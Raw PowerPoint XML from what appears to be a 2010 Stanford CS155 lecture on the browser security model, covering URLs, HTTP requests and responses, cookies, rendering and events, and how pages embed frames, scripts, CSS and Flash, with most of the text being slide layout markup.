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50" r:id="rId2"/>
    <p:sldMasterId id="2147483764" r:id="rId3"/>
    <p:sldMasterId id="2147483778" r:id="rId4"/>
    <p:sldMasterId id="2147483792" r:id="rId5"/>
    <p:sldMasterId id="2147483807" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId84"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId85"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="560" r:id="rId7"/>
    <p:sldId id="570" r:id="rId8"/>
    <p:sldId id="576" r:id="rId9"/>
    <p:sldId id="578" r:id="rId10"/>
    <p:sldId id="561" r:id="rId11"/>
    <p:sldId id="562" r:id="rId12"/>
    <p:sldId id="568" r:id="rId13"/>
    <p:sldId id="569" r:id="rId14"/>
    <p:sldId id="566" r:id="rId15"/>
    <p:sldId id="567" r:id="rId16"/>
    <p:sldId id="658" r:id="rId17"/>
    <p:sldId id="656" r:id="rId18"/>
    <p:sldId id="597" r:id="rId19"/>
    <p:sldId id="599" r:id="rId20"/>
    <p:sldId id="600" r:id="rId21"/>
    <p:sldId id="601" r:id="rId22"/>
    <p:sldId id="565" r:id="rId23"/>
    <p:sldId id="588" r:id="rId24"/>
    <p:sldId id="602" r:id="rId25"/>
    <p:sldId id="604" r:id="rId26"/>
    <p:sldId id="579" r:id="rId27"/>
    <p:sldId id="598" r:id="rId28"/>
    <p:sldId id="589" r:id="rId29"/>
    <p:sldId id="590" r:id="rId30"/>
    <p:sldId id="587" r:id="rId31"/>
    <p:sldId id="594" r:id="rId32"/>
    <p:sldId id="603" r:id="rId33"/>
    <p:sldId id="605" r:id="rId34"/>
    <p:sldId id="595" r:id="rId35"/>
    <p:sldId id="607" r:id="rId36"/>
    <p:sldId id="606" r:id="rId37"/>
    <p:sldId id="563" r:id="rId38"/>
    <p:sldId id="610" r:id="rId39"/>
    <p:sldId id="611" r:id="rId40"/>
    <p:sldId id="612" r:id="rId41"/>
    <p:sldId id="564" r:id="rId42"/>
    <p:sldId id="614" r:id="rId43"/>
    <p:sldId id="615" r:id="rId44"/>
    <p:sldId id="625" r:id="rId45"/>
    <p:sldId id="616" r:id="rId46"/>
    <p:sldId id="617" r:id="rId47"/>
    <p:sldId id="624" r:id="rId48"/>
    <p:sldId id="618" r:id="rId49"/>
    <p:sldId id="619" r:id="rId50"/>
    <p:sldId id="620" r:id="rId51"/>
    <p:sldId id="621" r:id="rId52"/>
    <p:sldId id="622" r:id="rId53"/>
    <p:sldId id="655" r:id="rId54"/>
    <p:sldId id="623" r:id="rId55"/>
    <p:sldId id="626" r:id="rId56"/>
    <p:sldId id="627" r:id="rId57"/>
    <p:sldId id="628" r:id="rId58"/>
    <p:sldId id="629" r:id="rId59"/>
    <p:sldId id="630" r:id="rId60"/>
    <p:sldId id="631" r:id="rId61"/>
    <p:sldId id="644" r:id="rId62"/>
    <p:sldId id="645" r:id="rId63"/>
    <p:sldId id="646" r:id="rId64"/>
    <p:sldId id="647" r:id="rId65"/>
    <p:sldId id="649" r:id="rId66"/>
    <p:sldId id="632" r:id="rId67"/>
    <p:sldId id="633" r:id="rId68"/>
    <p:sldId id="634" r:id="rId69"/>
    <p:sldId id="636" r:id="rId70"/>
    <p:sldId id="637" r:id="rId71"/>
    <p:sldId id="638" r:id="rId72"/>
    <p:sldId id="639" r:id="rId73"/>
    <p:sldId id="640" r:id="rId74"/>
    <p:sldId id="641" r:id="rId75"/>
    <p:sldId id="642" r:id="rId76"/>
    <p:sldId id="657" r:id="rId77"/>
    <p:sldId id="643" r:id="rId78"/>
    <p:sldId id="650" r:id="rId79"/>
    <p:sldId id="651" r:id="rId80"/>
    <p:sldId id="652" r:id="rId81"/>
    <p:sldId id="653" r:id="rId82"/>
    <p:sldId id="654" r:id="rId8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FF66"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="808080"/>
    <a:srgbClr val="869406"/>
    <a:srgbClr val="666699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7" autoAdjust="0"/>
    <p:restoredTop sz="94592" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="-360" y="-67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D74864-EB05-49AA-BA59-F6F5B317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35E1360-550A-4529-B4D2-5DC013EF6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DD2A54E-7F4A-4F8D-A2BF-E3597AA6488F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="965200"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0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FD1C102-9507-4FA8-81A7-7297927106E6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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D605EE26-1CB0-4E2A-B84D-C747D8E5CCE1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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68ED943-A644-4C17-8A4D-0F3838B180B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="966788"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673BA8A2-3806-44CB-8868-D0DD35F11572}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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3FFE947-B96B-4BD9-9503-1AFDA9018BFF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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6BF2-BDC9-4A46-8C6B-5725797173F9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46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5DCFB259-B646-486A-8557-3CA54B84E6E7}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>47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48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87D655A4-9836-418D-A32F-B201A5C1FF76}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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D8FEA-7778-4676-91F7-45872229C0A7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>64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Personalization:  NY Times says “Hi Fred”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F24E3-66CE-4EAD-839D-070122A087E4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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CE478-A8F0-4A48-9704-0207FAF3866A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>66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C6A965A-ACD5-4A3F-ADC5-CAF86F6BCB51}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200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8F60AA1-4A90-48DC-BEF0-CB42F8058452}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200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4C7B-B852-4000-BA8B-C9DA288BA792}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14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24E73DC-F075-4293-9626-6E109DDD83F6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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Allowscriptaccess:   alows flash object to communicate with external scripts, navigate frames, and open windows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67274-9BDE-4C79-90CE-228DCCF141E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904A546D-4F7E-42A3-A401-2722DE26BA08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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5E55E8C-DFFB-430A-AEF8-5ADB56F4FBCE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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20C872-3BC4-4E8F-8435-60B84CF2B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F07E4F-DE23-47CB-8EA0-3280D72B6049}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld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40458C"/>
              </a:solidFill>
            </a:endParaRPr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40458C"/>
              </a:solidFill>
            </a:endParaRPr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20C872-3BC4-4E8F-8435-60B84CF2BB6E}" type="slidenum">
              <a:rPr lang="en-GB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060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61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8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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/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0458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/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8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Browser Security Model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309938"/>
            <a:ext cx="5410200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>John Mitchell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476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CS155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6477000" y="1476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Arial" charset="0"/>
              </a:rPr>
              <a:t> Spring 2010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attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143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Browsers (like any software) contain exploitable bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often enable remote code execution by web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google study:     [the ghost in the browser 2007]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found Trojans on 300,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found adware on 18,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p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 smtClean="0"/>
              <a:t>ven </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if browsers were bug-free, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>still </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lots of vulnerabilities on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r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 of the vulnerabilities on previous graph: XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, CSRF, …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4191000"/>
            <a:ext cx="351942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OUR FOCUS THIS WEEK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Announcment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– Due Tues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Rendering content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Security User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Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and frame busting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URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135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Global identifiers of network-retrievable documents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b="1" dirty="0" smtClean="0"/>
              <a:t>Example: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http://stanford.edu:81/class?name=cs155#homework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Special characters are encoded as hex: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%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = newline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%20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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = space, %2B = +  (special exception)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371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2743200" y="2855913"/>
            <a:ext cx="246063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30480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657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5029200" y="2855913"/>
            <a:ext cx="1387475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2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="103188" y="353536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145833"/>
              <a:gd name="adj4" fmla="val 1140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Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4262438"/>
            <a:ext cx="1143000" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -364361"/>
              <a:gd name="adj4" fmla="val 13236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Hostname</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2151063" y="437991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413694"/>
              <a:gd name="adj4" fmla="val 984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Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4294188" y="4370388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22736"/>
              <a:gd name="adj4" fmla="val -7607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Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24590" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315075" y="4533900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76426"/>
              <a:gd name="adj4" fmla="val -148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Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24591" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3810000"/>
            <a:ext cx="1292225" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -194444"/>
              <a:gd name="adj4" fmla="val -5442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2241550"/>
            <a:ext cx="8305800" cy="2670175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80808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GET /index.html HTTP/1.1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Accept: image/gif, image/x-bitmap, image/jpeg, */*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Accept-Language: en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr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User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)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Host: www.example.com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Referer: http://www.google.com?q=dingbats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Request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996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Method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57400" y="1600200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File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9906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362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886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7391400" y="1976438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00200" y="5272088"/>
            <a:ext cx="238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 – none for GET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838200" y="4733925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00400" y="4905375"/>
            <a:ext cx="1263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Blank line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838200" y="4429125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54768" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="595313" y="6019800"/>
            <a:ext cx="8120493" cy="46166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GET :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>no side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect           POST :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>possible side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect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54075" y="2589213"/>
            <a:ext cx="7086600" cy="286226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HTTP/1.0 200 OK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Date: Sun, 21 Apr 1996 02:20:42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Server: Microsoft-Internet-Information-Server/5.0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Content-Type: text/html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Last-Modified: Thu, 18 Apr 1996 17:39:05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Set-Cookie: …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Content-Length: 2543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&lt;HTML&gt; Some data... blah, blah, blah &lt;/HTML&gt;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Response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77875" y="161925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39875" y="1943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97150" y="161925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Status code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37037" y="1619250"/>
            <a:ext cx="1822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Reason phrase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2530475" y="1943100"/>
            <a:ext cx="685800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063875" y="1943100"/>
            <a:ext cx="1676400" cy="738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483475" y="169545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6569075" y="2019300"/>
            <a:ext cx="1371600" cy="1042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199437" y="3671888"/>
            <a:ext cx="679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7050087" y="4052888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772150"/>
            <a:ext cx="1182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/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27663" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="344487" y="4400550"/>
            <a:ext cx="434975" cy="1460500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169607 w 435078"/>
              <a:gd name="T1" fmla="*/ 1460090 h 1460090"/>
              <a:gd name="T2" fmla="*/ 36872 w 435078"/>
              <a:gd name="T3" fmla="*/ 589936 h 1460090"/>
              <a:gd name="T4" fmla="*/ 66368 w 435078"/>
              <a:gd name="T5" fmla="*/ 117987 h 1460090"/>
              <a:gd name="T6" fmla="*/ 435078 w 435078"/>
              <a:gd name="T7" fmla="*/ 0 h 1460090"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 435078"/>
              <a:gd name="T13" fmla="*/ 0 h 1460090"/>
              <a:gd name="T14" fmla="*/ 435078 w 435078"/>
              <a:gd name="T15" fmla="*/ 1460090 h 1460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078" h="1460090">
                <a:moveTo>
                  <a:pt x="169607" y="1460090"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111843" y="1136855"/>
                  <a:pt x="54079" y="813620"/>
                  <a:pt x="36872" y="589936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19665" y="366252"/>
                  <a:pt x="0" y="216310"/>
                  <a:pt x="66368" y="117987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132736" y="19664"/>
                  <a:pt x="283907" y="9832"/>
                  <a:pt x="4350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Content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Rendering and events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203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Basic execution model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Each browser window or frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Loads content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Renders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processes HTML and scripts to display page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>May involve images, subframes, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Responds to events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Events can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User actions: OnClick, OnMouseover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Rendering: OnLoad, OnBeforeUnload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Timing: setTimeout(),  clearTimeout()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77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Pages can embed content from many sources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  <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/frame.html”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&gt;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2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>script   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/script.js”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;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2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> 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 typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>"  type="text /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site/com/theme.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>"  /&gt;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2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  (flash):       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>[using    swfobject.js   script ]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  <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;  	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> so = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>SWFObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/flash.swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>', …); 			 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>so.addParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>allowscriptaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>',  ‘always'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
